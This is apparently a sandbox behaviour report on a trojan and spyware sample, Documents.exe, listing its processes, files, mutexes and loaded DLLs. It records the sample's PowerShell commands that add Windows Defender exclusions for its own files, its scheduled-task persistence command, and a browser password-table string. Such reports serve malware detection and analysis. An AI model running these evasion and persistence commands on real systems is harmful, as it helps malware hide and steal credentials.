                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E837C16_2_029E837C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_02A0708C16_2_02A0708C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E815C16_2_029E815C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E64AC16_2_029E64AC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E64A016_2_029E64A0
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E64F516_2_029E64F5
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029DC5EF16_2_029DC5EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0119EA12 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01537E54 appears 102 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0155EA12 appears 86 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01177E54 appears 97 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01525130 appears 58 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014DB970 appears 280 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0156F290 appears 105 times
                    Source: Documents.exeStatic PE information: invalid certificate
                    Source: Documents.exe, 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2163169928.00000000078D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2156644192.0000000004372000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2147309515.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Documents.exe
                    Source: Documents.exeBinary or memory string: OriginalFilenameXiBt.exe: vs Documents.exe
                    Source: Documents.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: uFEeKIucsX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, OANgdeAkH9yusRxXWr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, OANgdeAkH9yusRxXWr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@14/13
                    Source: C:\Users\user\Desktop\Documents.exeFile created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMutant created: \Sessions\1\BaseNamedObjects\IKdbVkUUpHft
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                    Source: C:\Users\user\Desktop\Documents.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2505.tmpJump to behavior
                    Source: Documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Documents.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Documents.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: systray.exe, 00000011.00000002.4498880450.000000000074C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4498880450.0000000000742000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2523917187.0000000000742000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2523806347.0000000000721000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4498880450.000000000076D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Documents.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\Documents.exeFile read: C:\Users\user\Desktop\Documents.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Documents.exe "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                    Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
